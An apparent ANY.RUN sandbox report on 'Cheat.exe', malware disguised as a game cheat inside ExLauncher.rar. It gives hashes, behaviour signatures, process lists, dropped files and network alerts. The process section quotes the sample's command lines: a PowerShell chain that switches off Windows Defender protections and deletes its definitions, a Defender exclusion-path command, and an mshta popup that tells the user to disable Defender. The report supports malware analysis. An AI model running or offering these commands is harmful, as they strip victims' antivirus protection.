File name:

ExLauncher.rar

Full analysis: https://app.any.run/tasks/46fd3c36-c374-46da-8ed7-ffd317b74b46
Verdict: Malicious activity
Analysis date: November 14, 2024, 17:34:38
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

08A781953FAE70EEECAE8BCB20247A36

SHA1:

E5848372C67FCCD6E8CDAA98F0FC0C1E830B82A6

SHA256:

D774759FFA035CC87EC908759788B8972FDCB0502F66E951A597D9AE2A2454E8

SSDEEP:

98304:7ZTsue7kGO5NEjQznsum/PFRsPzbcHnADBp3pAejCISFJtd0xmIxpGypYd2PrX2B:mWbG76p5AYWcABh8uU6Qy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 6940)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 3028)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 1236)
      • Cheat.exe (PID: 6544)
      • Cheat.exe (PID: 7080)

    • Adds path to the Windows Defender exclusion list

      • Cheat.exe (PID: 3028)
      • cmd.exe (PID: 6180)
      • Cheat.exe (PID: 7080)
      • cmd.exe (PID: 1700)

    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 1568)
      • MpCmdRun.exe (PID: 6940)
      • cmd.exe (PID: 7104)
      • MpCmdRun.exe (PID: 5976)

    • Changes settings for real-time protection

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 6940)
      • MpCmdRun.exe (PID: 5976)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 7052)
      • powershell.exe (PID: 5840)

  • SUSPICIOUS

    • Starts a Microsoft application from unusual location

      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 6940)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 3028)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 1236)
      • Cheat.exe (PID: 6544)
      • Cheat.exe (PID: 7080)

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 5596)
      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 6544)

    • The process drops C-runtime libraries

      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 6544)

    • Executable content was dropped or overwritten

      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 6544)

    • Process drops python dynamic module

      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 6544)

    • Application launched itself

      • Cheat.exe (PID: 944)
      • Cheat.exe (PID: 6940)
      • Cheat.exe (PID: 5940)
      • Cheat.exe (PID: 7032)
      • Cheat.exe (PID: 1236)
      • Cheat.exe (PID: 6544)

    • Starts CMD.EXE for commands execution

      • Cheat.exe (PID: 3028)
      • Cheat.exe (PID: 7080)

    • Found strings related to reading or modifying Windows Defender settings

      • Cheat.exe (PID: 3028)
      • Cheat.exe (PID: 7080)

    • Get information on the list of running processes

      • Cheat.exe (PID: 3028)
      • cmd.exe (PID: 6168)
      • Cheat.exe (PID: 7080)
      • cmd.exe (PID: 6308)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 7104)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 6180)
      • cmd.exe (PID: 1700)
      • cmd.exe (PID: 7104)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 7104)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 5660)
      • cmd.exe (PID: 2864)

    • Checks for external IP

      • svchost.exe (PID: 2172)
      • Cheat.exe (PID: 3028)
      • Cheat.exe (PID: 7080)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6180)
      • cmd.exe (PID: 1700)

  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 5596)

    • The process uses the downloaded file

      • WinRAR.exe (PID: 5596)

    • Manual execution by a user

      • Cheat.exe (PID: 7032)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 7872016
UncompressedSize: 8008529
OperatingSystem: Win32
ArchivedFileName: Cheat.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
183
Monitored processes
50
Malicious processes
15
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe cheat.exe cheat.exe no specs cheat.exe cheat.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe no specs tasklist.exe no specs wmic.exe no specs svchost.exe mpcmdrun.exe no specs sechealthui.exe no specs securityhealthhost.exe no specs securityhealthhost.exe no specs securityhealthhost.exe no specs cheat.exe cheat.exe no specs cheat.exe cheat.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs mshta.exe no specs powershell.exe no specs tasklist.exe no specs wmic.exe no specs mpcmdrun.exe no specs sechealthui.exe no specs securityhealthhost.exe no specs securityhealthhost.exe no specs securityhealthhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
944"C:\Users\admin\AppData\Local\Temp\Rar$EXb5596.2387\Cheat.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb5596.2387\Cheat.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
File System Conversion Utility
Exit code:
0
Version:
10.0.20348.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb5596.2387\cheat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1236"C:\Users\admin\Desktop\Cheat.exe" C:\Users\admin\Desktop\Cheat.exeCheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
File System Conversion Utility
Exit code:
0
Version:
10.0.20348.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\cheat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
1440\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1568C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"C:\Windows\System32\cmd.exeCheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1700C:\WINDOWS\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop\Cheat.exe'"C:\Windows\System32\cmd.exeCheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1712C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -EmbeddingC:\Windows\System32\SecurityHealthHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Security Health Host
Exit code:
0
Version:
4.18.1907.16384 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\securityhealthhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msvcrt.dll
1712C:\WINDOWS\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please disable your windows defender to run cheat.', 0, 'WINDOWS DEFENDER ERROR', 0+16);close()""C:\Windows\System32\cmd.exeCheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2172C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2464"C:\WINDOWS\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mcaC:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Defender application
Exit code:
1
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\microsoft.windows.sechealthui_cw5n1h2txyewy\sechealthui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\wincorlib.dll
Total events
29 100
Read events
29 079
Write events
21
Delete events
0

Modification events

(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\ExLauncher.rar
(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(5596) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
1
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
74
Suspicious files
9
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_lzma.pydexecutable
MD5:055EB9D91C42BB228A72BF5B7B77C0C8
SHA256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_ssl.pydexecutable
MD5:7EF27CD65635DFBA6076771B46C1B99F
SHA256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_socket.pydexecutable
MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
SHA256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_queue.pydexecutable
MD5:513DCE65C09B3ABC516687F99A6971D8
SHA256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\VCRUNTIME140.dllexecutable
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_ctypes.pydexecutable
MD5:79879C679A12FAC03F472463BB8CEFF7
SHA256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_hashlib.pydexecutable
MD5:D6F123C4453230743ADCC06211236BC0
SHA256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_decimal.pydexecutable
MD5:21D27C95493C701DFF0206FF5F03941D
SHA256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\blank.aesbinary
MD5:4CFEF3F71EDE49F4D3B6B6520B0C67DF
SHA256:8172A3F14B9F15D6A5803207E0E7FD4FAE2D12E0FB1CB77FCF5A45115BB88CCB
944Cheat.exeC:\Users\admin\AppData\Local\Temp\_MEI9442\_sqlite3.pydexecutable
MD5:8CD40257514A16060D5D882788855B55
SHA256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
52
DNS requests
31
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5488
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
2.16.241.14:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.14:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4376
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2776
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6996
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
2776
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
6944
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5488
MoUsoCoreWorker.exe
2.16.241.14:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.16.241.14:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5488
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4360
SearchApp.exe
2.23.209.148:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4360
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4020
svchost.exe
239.255.255.250:1900
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.16.241.14
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
google.com
  • 142.250.186.78
whitelisted
www.bing.com
  • 2.23.209.148
  • 2.23.209.141
  • 2.23.209.158
  • 2.23.209.156
  • 2.23.209.154
  • 2.23.209.160
  • 2.23.209.149
  • 2.23.209.143
  • 2.23.209.150
  • 92.123.104.52
  • 92.123.104.56
  • 92.123.104.64
  • 92.123.104.51
  • 92.123.104.54
  • 92.123.104.66
  • 92.123.104.59
  • 92.123.104.47
  • 92.123.104.60
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.73
  • 20.190.159.64
  • 40.126.31.67
  • 20.190.159.23
  • 20.190.159.0
  • 40.126.31.73
  • 20.190.159.75
  • 20.190.159.68
whitelisted
th.bing.com
  • 2.23.209.162
  • 2.23.209.182
  • 2.23.209.179
  • 2.23.209.167
  • 2.23.209.181
  • 2.23.209.166
  • 2.23.209.173
  • 2.23.209.161
  • 2.23.209.178
  • 92.123.104.32
  • 92.123.104.36
  • 92.123.104.31
  • 92.123.104.28
  • 92.123.104.27
  • 92.123.104.30
  • 92.123.104.33
  • 92.123.104.37
  • 92.123.104.46
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

PID
Process
Class
Message
2172
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2172
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
3028
Cheat.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
7080
Cheat.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ExLauncher.rar